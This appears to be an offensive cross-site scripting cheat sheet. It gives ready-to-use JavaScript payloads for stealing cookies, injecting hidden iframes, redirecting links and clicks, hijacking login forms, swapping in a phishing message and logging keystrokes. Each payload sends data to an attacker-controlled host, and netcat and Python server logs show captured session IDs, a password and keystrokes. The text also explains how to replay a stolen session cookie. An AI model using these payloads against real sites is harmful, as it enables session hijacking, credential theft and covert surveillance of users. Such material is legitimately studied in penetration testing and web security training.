Stealing Cookies
1
2
<script> new Image().src="http://AttackerIP/bogus.php?output="+document.cookie; </script>
<script>document.location='http://AttackerIP/bogus.php?output='+document.cookie</script>
Start a netcat listener before injecting and you’ll receive the cookie:
1
2
3
4
5
6
7
8
9
10
# nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.113] 55540
GET /bogus.php?**output=PHPSESSID=tvd2ljlt16328t3ej2pqliv5e2**;%20LANG=EN_US;%20SINCE=1542307743;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: 10.10.14.21
Once we get an authorised user’s cookie, we can simply use a firefox extension like Cookie Quick Manager or Cookie Editor to introduce our stolen session ID into our browser and access the web app as that user.
Browser Redirection & IFRAME Injection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<iframe SRC="http://AttackerIP/report" height = "0" width ="0"></iframe>
// Once victim visits the affected output page, their browser connects to our attacking machine:
# nc -nlvp 80
listening on [any] 80 ...
connect to [AttackerIP] from (UNKNOWN) [Victim] 49275
GET /report HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://127.0.0.1/index.php
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: AttackerIP
Connection: Keep-Alive
// Browser redirection may be used to redirect a victim browser to a client side attack or to an information gathering script.
Modifiying HTML
- Changing the title of the target page to
New Title.
1
2
3
<script>
document.getElementsByTagName("h1")[0].innerHTML = "New Title";
</script>
Changing Links
- Changing all links on the target page to point to our attacking host, serving up the malicious file
evil.txt.
1
2
3
4
5
6
7
<script>
var links = document.getElementsByTagName("a");
for (i=0; i < links.length; i++)
{
links.[i].href = "http://AttackerIP/evil.txt";
}
</script>
Form Submission Hijacking
For the
usernameandpasswordvariables we select the first form, indicated byforms[0].We then select the first and second elements of said form, where
elements[0]represents the username input field andelements[1]the password input field.Data input into these fields are then assigned to their respective variables.
Once the form is submitted by the victim our function
InterceptFormis called:document.forms[0].onsubmit = InterceptForm;.We then simply send ourselves the captured credentials by leveraging
Image().srcand setting the value to our own HTTP server.
1
2
3
4
5
6
7
8
9
<script>
function InterceptForm()
{
var username = document.forms[0].elements[0].value;
var password = document.forms[0].elements[1].value;
new Image().src = "http://AttackerIP/?username="+username+"&password="+password;
}
document.forms[0].onsubmit = InterceptForm;
</script>
1
2
3
root@kali:~# python -m SimpleHTTPServer 80
// Receive the credentials from our JavaScript payload
... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -
Social Engineering
First we create the
h2element and input our new heading text, statingWebsite Under Construction.Secondly, we then create the
h3element and input our malicious redirect textPlease visit SuperSecureCompany.com.Upon clicking, the link will send the victim to a domain/malicious file under our control.
We want to keep our malicious domain as close to the target domain as possible, tricking the victim into believing the site is legitimately down and following our link.
Lastly we append our
h2andh3header elements to the page and remove the login form that was there orginally.
1
2
3
4
5
6
7
8
9
10
11
<script>
var input = document.createElement("h2");
input.innerHTML = "Website Under Construction"
var link = document.createElement("h3");
link.innerHTML = "Please visit" + " SuperSecureCompany.com".link('http://SuperSecComp.com/evil.txt');
document.forms[0].parentNode.appendChild(input);
document.forms[0].parentNode.appendChild(link);
document.forms[0].parentNode.removeChild(document.forms[0]);
</script>
Before injection:
After injection:
Capturing Clicks
We declare a function
CaughtClick, with a link to our malicious URL.We then add an
EventListenerto the document body.If the victim clicks anywhere on the page whilst browsing our target site, the event listener will ‘catch’ this click and run our
CaughtClickfunction. Sending the victim to a malicious site under our control.For more information on JavaScript events, please click here.
1
2
3
4
5
6
7
<script>
function CaughtClick()
{
location.href = "http://AttackerIP/evil.txt";
}
document.body.addEventListener('click', CaughtClick, true);
</script>
Keylogging
We assign the
onkeypressevent to our functionKeyLog.We then assign the victim’s input to the variable
input, and parse it as an argument to theKeyLogfunction.The
key_pressedvariable is assigned to a Unicode number, based on the specific key pressed by the victim, which is then converted into a character.Finally, we send each value of
key_pressedto our PythonSimpleHTTPServerusingImage().src.
1
2
3
4
5
6
7
<script>
document.onkeypress = function KeyLog(input)
{
key_pressed = String.fromCharCode(input.which);
new Image().src = "http://AttackerIP/?"+key_pressed;
}
</script>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# python -m SimpleHTTPServer 80
// Receive the keystrokes from our JavaScript payload
... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /? HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -